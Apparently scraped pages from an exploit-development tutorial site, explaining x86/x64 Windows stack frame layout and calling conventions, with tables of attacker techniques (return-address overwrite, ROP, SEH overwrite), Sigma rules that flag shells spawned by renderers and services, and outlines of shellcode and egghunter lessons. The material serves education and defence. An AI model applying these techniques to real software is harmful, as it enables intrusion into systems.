The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
/GS inserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.

References

Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout

Objective: Understand how the call stack is organized in x86 and x64 Windows processes — the mechanics of stack frames, function prologue/epilogue sequences, calling conventions, shadow space, and the exact memory layout a debugger reveals — so you can recognize a healthy stack versus a corrupted one and reason precisely about stack-based exploitation and its defenses.

1. Why the Stack Matters for Exploit Development

The stack is the primary battleground for classic memory-safety bugs. Saved return addresses, saved frame pointers, function arguments, and fixed-size local buffers all live side by side on the same contiguous, downward-growing region. When a write runs past the end of a stack buffer, it corrupts the very control-flow data the CPU will trust on the next RET.

For a defender, the same knowledge is diagnostic. A return address pointing into the stack or heap instead of an executable image, an RSP value that jumped thousands of bytes (a stack pivot), or a frame chain that no longer links cleanly are all signatures of corruption. You cannot recognize an abnormal stack until you have internalized a normal one.

2. The Stack as a Data Structure: Growth Direction and Address Space Layout

A Windows process virtual address space holds the mapped image (.text, .data), loaded DLLs, the heap, thread stacks, and per-thread/per-process control structures (TEB/PEB). Each thread receives its own stack, reserved and committed on demand.

The stack grows downward — toward lower addresses. PUSH decrements the stack pointer; POP increments it. The live top of the stack is always tracked by RSP (x64) / ESP (x86).

Register	Role
`RSP` / `ESP`	Stack pointer — always points to the top (lowest address) of the current frame
`RBP` / `EBP`	Base/frame pointer — anchors the frame in x86; in x64 not used for locals/args unless `alloca()` is used
`RIP` / `EIP`	Instruction pointer — saved as the return address by `CALL`
`RAX`	Integer/pointer return value (`XMM0` for floating-point)

3. x86 Stack Frames: Registers, Calling Conventions, and the EBP Chain

32-bit Windows supports several co-existing calling conventions, which is why x86 reversing requires you to identify the convention before reading arguments.

Convention	Cleanup	Argument Passing
`__cdecl`	Caller cleans	Right-to-left on stack
`__stdcall`	Callee cleans	Right-to-left on stack (Win32 API)
`__fastcall`	Callee cleans	First two in `ECX`/`EDX`, rest on stack
`__thiscall`	Callee cleans	C++ `this` in `ECX`, args on stack

x86 code conventionally uses EBP as a fixed frame anchor. Every local and argument is addressed relative to it, and each saved EBP points at the caller’s saved EBP, forming a walkable frame chain.

// MSVC x86, compiled /Od (no optimization)
void vuln(char *src) {
    char buf[64];      // local buffer — classic overflow target
    strcpy(buf, src);  // bounded only by src
}

; x86 frame for vuln(), high → low address
push ebp            ; save caller's EBP
mov  ebp, esp       ; EBP anchors this frame
sub  esp, 64        ; allocate buf[64]
; ... strcpy ...
; [EBP + 8]  -> arg1 (src)
; [EBP + 4]  -> return address   ← ret-overwrite target
; [EBP + 0]  -> saved EBP        ← frame chain link
; [EBP - 64] -> buf              ← overflow origin

A buffer overflow that walks upward from [EBP-64] crosses the saved EBP, then the return address — the two values the epilogue and RET consume.

Diagram showing the x86 stack frame layout from higher to lower addresses: function arguments, return address, saved EBP, local variables, and the buffer at the top of ESP — A typical x86 stack frame: overflowing the buffer at [EBP-N] walks upward through locals, corrupting saved EBP and then the return address.

4. x64 Stack Frames: The Windows ABI and Shadow Space

The Windows x64 ABI consolidates every x86 convention into a single calling convention. The first four integer or pointer parameters pass in RCX, RDX, R8, R9; the first four floating-point parameters in XMM0–XMM3. Additional arguments spill onto the stack.

Two rules dominate the x64 layout:

Shadow space (home space): The caller allocates 32 bytes immediately above the return address, regardless of how many parameters are actually used. The callee may dump RCX/RDX/R8/R9 into this home space if it needs to spill them.
16-byte alignment: RSP must be 16-byte aligned at a CALL. Because CALL pushes an 8-byte return address, RSP is 16n+8 before the call and 16n-aligned on entry to the callee.

Critically, x64 functions typically address locals and arguments RSP-relative, leaving RSP constant for the body of the function. RBP is freed for general use unless alloca() is present.

[High address — caller's frame]
  Stack arg 5+      ← [RSP + 0x28+]
  Shadow [R9]       ← [RSP + 0x20]
  Shadow [R8]       ← [RSP + 0x18]
  Shadow [RDX]      ← [RSP + 0x10]
  Shadow [RCX]      ← [RSP + 0x08]   (relative to callee entry)
  Return Address    ← [RSP + 0x00]   ← ret-overwrite target
  Local variables   ← [RSP - N]
[Low address — grows downward]

Diagram of the x64 Windows ABI stack layout showing extra arguments, 32-byte shadow space, return address, saved non-volatile registers, and local variables down to RSP — The x64 Windows ABI reserves 32 bytes of shadow space above the return address; RSP remains constant through the function body for RSP-relative addressing.

5. Volatile vs. Non-Volatile Registers and Leaf Functions

The x64 convention splits the register file into volatile (caller-saved) and non-volatile (callee-saved). A function that clobbers a non-volatile register must save and restore it in its prologue/epilogue.

Class	Registers
Volatile (caller-saved)	`RAX`, `RCX`, `RDX`, `R8`–`R11`, `XMM0`–`XMM5`
Non-volatile (callee-saved)	`RBX`, `RBP`, `RDI`, `RSI`, `R12`–`R15`, `XMM6`–`XMM15`

A leaf function changes no non-volatile register (including not altering RSP by calling out). A non-leaf function calls another function — which adjusts RSP — and therefore must establish a frame and register unwind data. This distinction drives whether the compiler emits a prologue and .pdata entry at all.

6. Prologue and Epilogue Deep Dive

The prologue establishes the frame: save callee-saved registers and reserve local space. The epilogue reverses it and returns.

; x86 epilogue
mov  esp, ebp      ; free locals
pop  ebp           ; restore caller's EBP
ret                ; pop return address → EIP

LEAVE is a single instruction equivalent to mov esp, ebp + pop ebp, available on both x86 and x64.

; x64 MASM (ml64) non-leaf frame
sub  rsp, 0x28     ; 0x20 shadow + 8 align pad
; ... body uses [rsp+0x..] for locals/spills ...
add  rsp, 0x28     ; deallocate
ret                ; pop return address → RIP

Many optimized x64 functions omit push rbp entirely and address everything from RSP. Frame Pointer Omission (FPO) saves two instructions and frees RBP as a general register; GCC/Clang do this by default at -O2, and MSVC does similarly with /O2. For exploitation this matters: without a frame pointer there is no [EBP+4] anchor for the return address — offsets must be computed from RSP at a known instruction.

__declspec(noinline) int callee(int a, int b, int c, int d) {
    int local = a + b + c + d;   // forces a real frame + homing
    return local;
}
int caller(void) { return callee(1, 2, 3, 4); }

Compile this on Godbolt or step it in WinDbg to watch RCX/RDX/R8/R9 home into shadow space.

7. Unwind Data and Structured Exception Handling

x64 Windows requires every non-leaf function to register unwind data in the PE .pdata and .xdata sections so the OS can walk frames during structured exception handling. Each function publishes a RUNTIME_FUNCTION and an associated UNWIND_INFO that describes the prologue.

typedef struct _RUNTIME_FUNCTION {
    ULONG BeginAddress;
    ULONG EndAddress;
    ULONG UnwindData;   // RVA to UNWIND_INFO
} RUNTIME_FUNCTION, *PRUNTIME_FUNCTION;

RtlVirtualUnwind() consumes this data to reconstruct caller frames without a frame pointer. For defenders, intact, parseable unwind data is what lets EDR and crash tooling produce a reliable call stack; ROP chains and stack pivots frequently produce stacks that fail to unwind cleanly — itself a detectable anomaly.

8. Reading Stack Frames in a Debugger

In WinDbg or x64dbg you read the live frame directly off RSP.

bp mymodule!vuln        ; break at the function
g                       ; run to it
dps rsp L10             ; dump 16 pointer-sized stack slots
r rsp, rbp, rip         ; show live pointers
k                       ; walk the call stack (uses unwind data)

dps rsp L10 prints the raw stack; the slot at [RSP+0x08] after entry (or the top after the prologue) holds the saved return address, which k resolves to module!function+offset. A return address that resolves to no module — or to the stack itself — is the first sign of a hijacked frame.

9. How Stack Overflows Corrupt Frame Integrity

Overflowing a fixed local buffer writes past its bounds toward higher addresses, in the direction of the saved frame pointer and the return address.

# Conceptual layout arithmetic — NOT a payload.
# 64-byte buffer sitting below the saved return address.
import struct

buf_size      = 64
saved_rbp     = 8          # x86: 4
ret_addr_slot = 8          # x86: 4
offset_to_ret = buf_size + saved_rbp   # bytes before reaching the return slot

print(f"bytes before saved frame ptr: {buf_size}")
print(f"bytes before return address : {offset_to_ret}")

When execution reaches RET, the CPU pops whatever now sits in the return slot into RIP/EIP and jumps there. A controlled overwrite places a valid, attacker-chosen address (a gadget or function); an uncontrolled overwrite leaves garbage, producing an immediate access violation. The distinction matters operationally: uncontrolled corruption crashes loudly (WER dump), while a precise overwrite can transfer control silently — which is exactly why the compiler inserts a guard between the buffer and the return address.

Flow diagram showing how an oversized buffer write sequentially corrupts the GS cookie, saved frame pointer, and return address before RET transfers control to an attacker-chosen address — A stack overflow progresses deterministically from the buffer edge through the GS cookie and saved frame pointer to the return address, hijacking control at the next RET.

10. Modern Mitigations and What They Change About the Layout

Mitigations alter the frame layout or the trust placed in it; none remove the need to understand the stack.

// /GS inserts a cookie between locals and the saved frame data.
void vuln(char *src) {
    char buf[64];
    // prologue: mov rax, __security_cookie; xor rax, rsp; mov [rsp+0x..], rax
    strcpy(buf, src);
    // epilogue: mov rcx, [rsp+0x..]; xor rcx, rsp; call __security_check_cookie
}

Mitigation	Structural Effect
`/GS` stack cookie	`__security_cookie` placed between locals and saved return address; mismatch → `__report_gsfailure`
DEP / NX	`IMAGE_DLLCHARACTERISTICS_NX_COMPAT`; stack pages non-executable, blocking on-stack shellcode
ASLR	`IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE`; randomizes stack/image base, breaking hardcoded addresses
Control Flow Guard	`IMAGE_GUARD_CF_INSTRUMENTED`; validates indirect call targets
Intel CET Shadow Stack	`CETCOMPAT` mitigation; read-only shadow copy of return addresses defeats classic ret-overwrites

11. Common Attacker Techniques

Technique	Description
Saved return-address overwrite	Overflow a local buffer to replace `[RSP+0x08]`/`[EBP+4]` and redirect `RET`
Saved frame pointer overwrite	Corrupt saved `RBP`/`EBP` to desynchronize the frame chain or pivot
Stack pivot	Use a gadget (`xchg rsp, rax`; `leave; ret`) to point `RSP` at attacker data
ROP chaining	Defeat DEP by chaining `ret`-terminated gadgets via the corrupted stack
SEH overwrite (x86)	Corrupt the exception handler chain on the stack to gain control on fault
Off-by-one / frame-pointer overwrite	Single-byte overflow to truncate or shift `EBP`, shifting subsequent frame math

These primitives all depend on knowing the exact offset from a controllable buffer to the saved control-flow data — which is precisely the layout this tutorial defines.

12. Defensive Strategies & Detection

Detection focuses on the crash artifacts and post-exploitation behavior that stack corruption produces, since the corruption itself is often only visible at the moment of RET.

Signal	Detail
Windows Error Reporting	Access violation at abnormal `RIP`; dumps under `%LOCALAPPDATA%\Microsoft\Windows\WER\ReportQueue`; Application Event `1000`/`1001`
Sysmon Event ID 1	Unusual child process from document/browser renderers (T1203 follow-on)
Sysmon Event ID 10	Cross-process stack reads via `ReadProcessMemory`
Security Event 4672	Special privileges to an unexpected logon (T1068 follow-on)
ETW `Microsoft-Windows-Kernel-Process`	Anomalous `RIP`/`RSP` deltas via call-stack sampling (stack pivot)
ETW `Microsoft-Windows-Security-Mitigations`	Emits events when CFG, DEP, or Shadow Stack violations are blocked

A practical first-line Sigma sketch catches the most common post-exploitation chain — a renderer spawning a shell:

title: Suspicious Child Process From Document Renderer
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\WINWORD.EXE'
      - '\EXCEL.EXE'
      - '\AcroRd32.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\wscript.exe'
  condition: selection
level: high

Hardening checklist: compile with /GS (verify no /GS-), link /NXCOMPAT and /DYNAMICBASE, enable CFG with /guard:cf, turn on CET via SetProcessMitigationPolicy(ProcessUserShadowStackPolicy, ...), enforce /SAFESEH on x86, and configure Windows Defender Exploit Guard for legacy binaries. MITRE mitigation M1050 (Exploit Protection) bundles these OS controls.

13. MITRE ATT&CK Mapping

Stack layout knowledge is foundational rather than a single technique; the mapping below frames it in the defensive direction — recognizing the artifacts each technique produces.

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Sysmon `EventID 1` renderer child chains; WER crash dumps
Exploitation for Privilege Escalation	`T1068`	Security `EventID 4672` unexpected source process
Exploit Public-Facing Application	`T1190`	Service crash loops + WER on network-facing daemons
Reflective Code Loading	`T1620`	ETW call-stack anomalies; non-image-backed `RIP`
Process Injection	`T1055`	Sysmon `EventID 8`/`10`; abnormal cross-process access

14. Tools for Stack Analysis

Tool	Description	Link
WinDbg	Kernel/user debugging, `k`, `dps`, unwind walking	microsoft.com
x64dbg	Live user-mode stack inspection on x64/x86	x64dbg.com
Godbolt Compiler Explorer	View prologue/epilogue and FPO across compilers	godbolt.org
Ghidra	Static reconstruction of frames and calling conventions	ghidra-sre.org
Process Hacker	Live thread stacks and call-stack walking	processhacker.sourceforge.io
NASM	Assemble illustrative prologue/epilogue snippets	nasm.us
GDB + pwndbg	Cross-platform frame and offset analysis	gdb.gnu.org

Summary

The stack is a downward-growing region where buffers sit beside the very return address the CPU trusts at RET — which is why it is the primary target of memory-safety exploits.
x86 frames anchor on EBP with multiple calling conventions; x64 uses one convention, RCX/RDX/R8/R9 parameters, 32-byte shadow space, 16-byte alignment, and RSP-relative addressing.
The prologue saves non-volatile registers and reserves locals; the epilogue (LEAVE/RET) reverses it; frame-pointer omission removes the [EBP+4] anchor and forces RSP-relative offset math.
Overflows corrupt saved RBP/EBP and the return address; /GS, DEP, ASLR, CFG, and CET Shadow Stack change the layout’s trust model but not the need to understand it.
Detect follow-on activity via WER dumps, Sysmon EventID 1/10, Security 4672, and ETW mitigation/call-stack events, mapped to T1203 and T1068.

References

x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V

Objective: Understand how the five major calling conventions — cdecl, stdcall, fastcall, the Microsoft x64 ABI, and the System V AMD64 ABI — dictate argument passing, register ownership, stack cleanup, and alignment, and exactly why those rules determine where return addresses and arguments sit in memory when a vulnerability is triggered.

1. Why Calling Conventions Matter for Exploit Development

A calling convention is the contract between a caller and a callee. It specifies how arguments are passed (stack or registers), where the return value lands, which registers the callee must preserve, and who cleans up the stack. None of this is arbitrary — it is fixed by the ABI for a given platform and compiler.

For a defender or authorized red-teamer, this matters because stack layout is deterministic. When a local buffer overflows, the bytes that land on the saved return address are determined entirely by the convention in force. Reliable overflow payloads, return-to-libc chains, and ROP gadgets all depend on knowing precisely where the return address, arguments, and saved registers sit. Get the convention wrong and your offset math is wrong.

2. Stack Mechanics Refresher: PUSH, POP, CALL, RET

The stack grows downward (toward lower addresses). PUSH decrements the stack pointer (ESP/RSP) and writes; POP reads and increments it.

CALL target pushes the return address (the next instruction’s EIP/RIP) onto the stack, then jumps.
RET pops that saved address back into the instruction pointer.
RET N pops the address and adds N to ESP — this is how a callee cleans caller-pushed arguments.

push arg1          ; arg on stack
call foo           ; pushes return address, jumps to foo
add  esp, 4        ; caller cleans 1 dword arg (cdecl)

Because CALL writes the return address to a predictable slot, any write primitive that reaches that slot redirects control flow. Every convention below differs only in how the arguments around that slot are arranged.

3. x86 cdecl: The C Standard

__cdecl is the default for C functions on 32-bit x86 (MSVC flag /Gd). Arguments are pushed right to left, and the caller cleans the stack. The return value comes back in EAX. C names are decorated with a single leading underscore (_foo), no case translation.

Because the caller cleans up, cdecl is the only x86 convention that supports variadic functions (printf-style va_list) — the callee never needs to know the argument count.

; foo(1, 2, 3);  -- cdecl
push 3             ; rightmost first
push 2
push 1             ; leftmost last
call _foo
add  esp, 12       ; CALLER cleans 3 dwords

Canonical x86 stack frame at function entry (high → low address):

[arg N]          ← pushed last (rightmost)
[arg 2]
[arg 1]          ← pushed first
[return address] ← pushed by CALL
[saved EBP]      ← pushed by prologue (PUSH EBP)
[local vars]     ← ESP after SUB ESP, N

The saved EBP and return address are the primary targets of a stack-based overflow. Overflow a local buffer and you overwrite them in that exact order.

Diagram showing x86 cdecl stack frame from high to low address: last argument, first argument, saved return address, saved EBP, then local buffer where overflow begins — In cdecl, overflowing a local buffer overwrites saved EBP and then the return address in exactly this order — making the offset deterministic.

4. x86 stdcall: The Windows API Convention

__stdcall is the convention for the Win32 API. Arguments still push right to left, but the callee cleans the stack using RET N. This is efficient for fixed-argument functions, but it forbids variadics.

Name decoration encodes the byte count of stack arguments: a leading underscore, an @, then the size in bytes (always a multiple of 4). MessageBoxA with four pointer/int args becomes _MessageBoxA@16.

; foo(1, 2);  -- stdcall, two dword args
push 2
push 1
call _foo@8
; NO add esp here — callee handled it
foo:
    ; ... body ...
    ret 8          ; CALLEE pops 8 bytes of args

For shellcode and custom loaders, the @N suffix matters when resolving and patching the Import Address Table — the decorated name must match the export.

5. x86 fastcall: Register-Based Argument Passing

__fastcall (MSVC flag /Gr) passes the first two integer arguments in ECX and EDX; remaining arguments push right to left, and the callee cleans them. Decoration uses a leading @ (e.g. @foo@8). All __fastcall functions must have prototypes.

; foo(1, 2, 3);  -- MSVC fastcall
mov  ecx, 1        ; arg1 in ECX
mov  edx, 2        ; arg2 in EDX
push 3             ; arg3 on stack
call @foo@12

⚠️ Compiler variance: __fastcall is not standardized across compilers. MSVC uses ECX/EDX. Borland passes the first three arguments in EAX, EDX, ECX. When reversing a non-MSVC binary, verify register usage before trusting any decompiler’s __fastcall label.

6. Microsoft x64 ABI: The Modern Windows Convention

On Windows x64 there is effectively one ABI; the /Gd, /Gr, /Gz flags only exist for x86 targets. The convention is a four-register fastcall:

Argument slot	Integer register	Float register
1	`RCX`	`XMM0`
2	`RDX`	`XMM1`
3	`R8`	`XMM2`
4	`R9`	`XMM3`

Key rules:

One-to-one correspondence: each argument maps to exactly one register/slot; a single argument is never split across registers.
Any argument larger than 8 bytes, or not sized 1/2/4/8 bytes, is passed by reference.
Arguments beyond the first four go on the stack after the shadow space.
The stack must be 16-byte aligned before CALL.
The x87 stack is unused; all floating-point work uses the 16 XMM registers and is volatile across calls.

Shadow space (home space): the caller must allocate 32 bytes on the stack before the CALL, even if the callee takes fewer than four arguments, and reclaim it afterward. The callee may spill RCX/RDX/R8/R9 into this region.

; foo(a, b, c, d) -- Microsoft x64
mov  rcx, a
mov  rdx, b
mov  r8,  c
mov  r9,  d
sub  rsp, 20h      ; 32 bytes shadow space (caller's job)
call foo
add  rsp, 20h      ; reclaim shadow space

Volatile (caller-saved): RAX, RCX, RDX, R8, R9, R10, R11, XMM4, XMM5.
Non-volatile (callee-saved): RBX, RBP, RDI, RSI, R12–R15, XMM6–XMM15.

Diagram of Microsoft x64 ABI stack layout showing stack arguments above the mandatory 32-byte shadow space, the saved return address written by CALL, and the callee local frame below, with registers RCX RDX R8 R9 carrying the first four arguments — The mandatory 32-byte shadow space sits between caller stack arguments and the saved return address, shifting buffer-to-RIP offsets by 32 bytes versus an equivalent System V frame.

7. System V AMD64 ABI: The Linux and macOS Convention

System V AMD64 is followed on Linux, macOS, FreeBSD, Solaris, and other POSIX systems. It uses six integer argument registers:

Argument slot	Integer register	Float register
1	`RDI`	`XMM0`
2	`RSI`	`XMM1`
3	`RDX`	`XMM2`
4	`RCX`	`XMM3`
5	`R8`	`XMM4`–`XMM7` (5–8)
6	`R9`

Additional arguments push onto the stack in reverse order. The return value is in RAX; for 128-bit returns the high 64 bits go in RDX. The stack is 16-byte aligned just before CALL.

Callee-saved: RBX, RBP, R12–R15. All others are caller-saved.
Red zone: the 128 bytes below RSP are reserved and untouched by signal/interrupt handlers. Leaf functions may use this area as their entire frame without adjusting RSP.
Syscall variant: kernel entry uses the same registers except R10 replaces RCX (because the syscall instruction clobbers RCX).
Varargs: for variadic functions, RAX must hold the number of vector (XMM) registers used, 0–8.

; write(1, buf, len) via syscall -- System V
mov  rax, 1         ; sys_write
mov  rdi, 1         ; fd (arg1)
mov  rsi, buf       ; buffer (arg2)
mov  rdx, len       ; count (arg3)
; NOTE: a syscall uses R10 in place of RCX for arg4
syscall
; leaf function may freely use [rsp-128 .. rsp] (red zone)

⚠️ Shadow space vs. red zone are mutually exclusive and commonly confused. Shadow space (32 bytes above the call) exists only on Windows x64. The red zone (128 bytes below RSP) exists only on System V. Never assume both.

Graph comparing System V AMD64 ABI and Microsoft x64 ABI side by side, highlighting differing argument registers, the System V red zone versus the Microsoft shadow space, and their shared 16-byte alignment requirement — Red zone and shadow space are mutually exclusive per-platform features — conflating them is a classic source of cross-platform shellcode crashes.

8. Side-by-Side Comparison and ABI Detection in Disassembly

Property	Microsoft x64	System V AMD64
Integer arg registers	`RCX, RDX, R8, R9`	`RDI, RSI, RDX, RCX, R8, R9`
FP arg registers	`XMM0`–`XMM3`	`XMM0`–`XMM7`
Shadow space	32 bytes (mandatory)	None
Red zone	None	128 bytes below `RSP`
Callee-saved	`RBX, RBP, RDI, RSI, R12`–`R15`, `XMM6`–`15`	`RBX, RBP, R12`–`R15`

Recognition heuristics in IDA/Ghidra:

A sub rsp, 0x20 immediately before CALL and arguments loaded into RCX/RDX/R8/R9 ⇒ Microsoft x64.
Arguments loaded into RDI/RSI/RDX and writes into [rsp-8] without a prior sub rsp ⇒ System V (red zone).
A ret N (non-zero immediate) on 32-bit code ⇒ stdcall or fastcall; arguments in ECX/EDX distinguish fastcall.
A bare ret with caller-side add esp, N ⇒ cdecl.

Automated ABI detection can misfire on hand-written assembly, non-MSVC fastcall, or -fomit-frame-pointer builds — always confirm against the actual prologue.

9. Calling Conventions as an Attack Surface

Each convention places the return address at a known offset from a local buffer. That offset is the difference between a working and a failing overflow.

In 64-bit binaries, overflowing a buffer controls stack contents, not registers directly — which is exactly why return-oriented programming is needed. To call a libc function on x64 Linux, you must first load the argument register: a pop rdi ; ret gadget sets arg 1 before the call. This is a direct consequence of the System V ABI placing arg 1 in RDI.

On Windows x64, the mandatory 32-byte shadow space shifts the offset from a local buffer to the saved return address by 32 bytes versus an equivalent Linux frame — a classic source of off-by-32 errors in cross-platform shellcode.

A conceptual offset calculator makes the dependency explicit:

def return_addr_offset(buf_size, conv):
    # bytes from start of local buffer to the saved return address
    if conv == "x86_cdecl" or conv == "x86_stdcall":
        return buf_size + 4            # + saved EBP (4 bytes)
    if conv == "sysv_amd64":
        return buf_size + 8            # + saved RBP (8 bytes)
    if conv == "ms_x64":
        return buf_size + 8 + 0x20     # saved RBP + 32B shadow space
    raise ValueError("unknown convention")

Frame-pointer presence (-fomit-frame-pointer removes saved RBP) and shadow space both change the answer — which is why convention awareness precedes any reliable payload.

Flow diagram of a ROP chain on System V AMD64 showing overflow redirecting to a pop-rdi-ret gadget loading arg1 into RDI, then a pop-rsi-ret gadget loading arg2 into RSI, before jumping to a libc function — Every ROP gadget that loads a register is a direct consequence of the ABI — on System V you need pop rdi; ret for arg 1 because the convention mandates RDI, not the stack.

10. Common Attacker Techniques

Technique	Description
Saved return-address overwrite	Overflow a local buffer to clobber the convention-determined return slot
Return-to-libc (x86)	Stack-arranged args (cdecl) let an attacker call `system()` without shellcode
ROP register loading (x64)	Use `pop rdi ; ret` / `pop rcx ; ret` gadgets to satisfy the ABI before a call
Shadow-space-aware stack pivot	Account for the 32-byte home space when chaining Windows x64 gadgets
IAT patching via decoration	Resolve `_func@N` decorated stdcall imports for shellcode loaders
Reflective API calls	Manually set up RCX/RDX/R8/R9 + shadow space before invoking `LoadLibraryA`

Reflective loaders and injected shellcode must respect the target ABI exactly — wrong argument registers or a missing shadow allocation crashes the call.

11. Defensive Strategies & Detection

Note: A calling convention is a compile-time/binary property — no Sysmon Event ID fires because a convention is used. Detection is indirect: it triggers on the runtime artifacts of a convention-aware exploit.

Compile-time mitigations motivated directly by convention layout:

Stack canaries — /GS (MSVC), -fstack-protector-strong (GCC/Clang) detect return-address overwrite before RET.
Control Flow Guard — /guard:cf validates indirect CALL targets.
Intel CET / Shadow Stack — hardware enforces that RET pops the address CALL pushed, directly countering return-address overwrites. Mark binaries with IMAGE_DLLCHARACTERISTICS_GUARD_CET_COMPAT (0x4000).
ASLR + PIE — randomizes addresses so known layout still yields unknown absolute targets.
-mno-red-zone — hardens Linux kernel modules against red-zone clobbering.

Runtime telemetry for the exploitation aftermath:

Sysmon Event ID 1 (Process Create) — anomalous children of network-facing services after a successful ROP/return-to-libc chain.
Sysmon Event ID 10 (Process Access) — VirtualAllocEx/WriteProcessMemory from convention-correct injected shellcode.
Sysmon Event ID 7 (Image Load) — unexpected DLL loads from a corrupted return address redirecting into LoadLibrary.
Microsoft-Windows-Threat-Intelligence ETW — kernel telemetry on NtAllocateVirtualMemory / NtWriteVirtualMemory.
Audit Process Creation (Event 4688) with command-line logging.

title: Suspicious Child Process from Network-Facing Service After Exploitation
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 1
    ParentImage|endswith:
      - '\w3wp.exe'
      - '\sqlservr.exe'
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
  condition: selection
level: high

12. Tools for Calling-Convention Analysis

Tool	Description	Link
IDA Pro / Ghidra	Decompiler ABI inference and stack-frame reconstruction	ghidra-sre.org
x64dbg	Live register/stack inspection on Windows	x64dbg.com
GDB + pwndbg	Stack and register view on Linux (`x/16gx $rsp`)	gnu.org
WinDbg	Inspect shadow space and frame layout (`dd rsp`)	microsoft.com
Godbolt Compiler Explorer	Compare emitted asm across conventions/compilers	godbolt.org
ROPgadget / Ropper	Enumerate `pop rdi ; ret`-style register-loading gadgets	github.com
NASM	Hand-assemble convention test cases	nasm.us
Radare2	Cross-platform disassembly and ABI heuristics	rada.re

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Crash telemetry, Event `4688` child-process anomalies
Exploit Public-Facing Application	`T1190`	WAF/IDS, anomalous service children (Event ID 1)
Process Injection	`T1055`	Sysmon Event ID 10 (`VirtualAllocEx`/`WriteProcessMemory`)
Process Injection: DLL Injection	`T1055.001`	Event ID 7 unexpected `LoadLibraryA` loads
Command and Scripting Interpreter	`T1059`	Event ID 1 `cmd.exe`/`powershell.exe` spawns
Reflective Code Loading	`T1620`	ETW Threat-Intelligence memory-write telemetry

ATT&CK has no technique ID for “calling-convention abuse” — convention knowledge is prerequisite craft underlying these exploitation and injection techniques.

Summary

Calling conventions are the binary-level contract that makes stack layout deterministic — and therefore exploitable.
x86 splits into cdecl (caller cleanup, variadics, _foo), stdcall (callee RET N, _foo@N), and fastcall (ECX/EDX, MSVC-specific vs. Borland’s EAX/EDX/ECX).
The two 64-bit ABIs differ in argument registers (RCX,RDX,R8,R9 vs. RDI,RSI,RDX,RCX,R8,R9), shadow space (Windows only) vs. red zone (System V only), and callee-saved sets.
Convention dictates the buffer-to-return-address offset and the ROP register-loading gadgets required — pop rdi ; ret on Linux, shadow-space accounting on Windows.
Detect the exploitation artifacts, not the convention: Sysmon Event IDs 1/7/10, ETW Threat-Intelligence telemetry, and Event 4688, hardened with canaries, CFG, and CET shadow stacks.

1. Why Egghunters Exist

2. The Page-Walk Problem

3. Anatomy of the Syscall Egghunter

4. The SEH-Based Variant

5. Egg Tags and Bad Characters

6. WoW64 and Windows 10

7. Wiring It Into an SEH Overflow

8. Lab: VulnServer KSTET

9. Detecting Egghunter Behavior

10. Tools for Egghunter Analysis

11. Mitigations and Modern Reality

12. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

1. Why Shellcode Breaks: Bad Characters

2. The XOR Contract

3. Finding the Bad Chars

4. Building an XOR Encoder in Python

5. The Decoder Stub in x86 (NASM)

6. The Stub Must Be Clean Too

7. Per-Chunk Keyed Encoding

8. Stack-Based Decoding

9. shikata_ga_nai: the State of the Art

10. Detection and Defense: What the Blue Team Sees

Sysmon Event IDs

Sigma Rule

ETW providers

Hardening

11. Tools

12. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

1. What Makes Code Position-Dependent?

2. The Problem with the IAT

3. Windows Memory Layout Primer: TEB, PEB, and the Loader

4. Walking the Module List to Find kernel32.dll

5. Parsing the PE Export Directory

6. Function Name Hashing (ROR-13)

7. RIP-Relative Addressing and the CALL/POP Trick

8. Stack Strings and Null-Byte Elimination

9. x64 ABI Constraints: Shadow Space and Alignment

10. Extraction and Controlled Testing

11. Common Attacker Techniques

12. Defensive Strategies & Detection

13. Tools for PIC Shellcode Analysis

14. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

1. From x86 to x64: What Actually Changed

2. The Microsoft x64 ABI Deep-Dive

Volatile vs Non-Volatile Registers

Side-by-Side: x86 Push vs x64 Register Load

3. Shadow Space: Why, What, and Where

4. Stack Alignment in Practice

5. Position-Independent Code Fundamentals

6. PEB Walking: Finding kernel32.dll Without Imports

7. Parsing the Export Address Table

8. Null-Byte and Bad-Character Avoidance

9. Shellcode Skeleton: Putting It Together

10. Common Attacker Techniques

11. Defensive Strategies & Detection

12. Tools for x64 Shellcode Analysis

13. MITRE ATT&CK Mapping

Summary

Related Tutorials

References

1. What Is Shellcode? Constraints and Goals

2. x86 Calling Conventions and Stack Mechanics

3. The PEB Walk: Finding kernel32.dll Without Imports

4. Export Table Parsing: Resolving GetProcAddress

5. Bootstrapping Further API Resolution

6. Winsock Initialisation and Socket Creation

7. Spawning cmd.exe Over the Socket

8. Null-Byte Elimination and Bad-Character Audit

9. Testing and Verification

10. Common Attacker Techniques

11. Defensive Strategies and Detection

2. Why `\x00` Is Always the First Enemy